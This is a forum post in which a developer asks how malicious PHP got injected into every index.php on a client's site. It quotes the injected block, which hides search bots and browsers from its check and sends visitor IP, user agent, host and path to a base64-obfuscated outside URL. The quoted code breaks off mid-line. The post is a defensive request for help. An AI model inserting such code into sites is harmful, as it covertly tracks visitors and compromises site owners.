Website hacked...strange

Ninjakreborn

The code below was inserted into every single index.php on one of my clients sites.  It went through and every single index.php page (in each folder) had that following code put in.  It was

strange. As far as I can tell there are no FTP logs, besides my own IP.  This site was heavily built by someone else, I have been enhancing the system for a few months but it hasn't undergone a

full security audit yet.  What could have caused this. The weird thing is it's not loading it into the very top of the file..the security.inc.php is my file..and somehow they always get inserted below that file. But the <?

is inserted right after it.  I also don't use generally the <? shorthand, that was his previous code..but that entire <? block that has the hack attempt is very strange.

Any advice on how this is generally done, and anyone with similar issues?

<? require_once('security.inc.php'); ?><?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);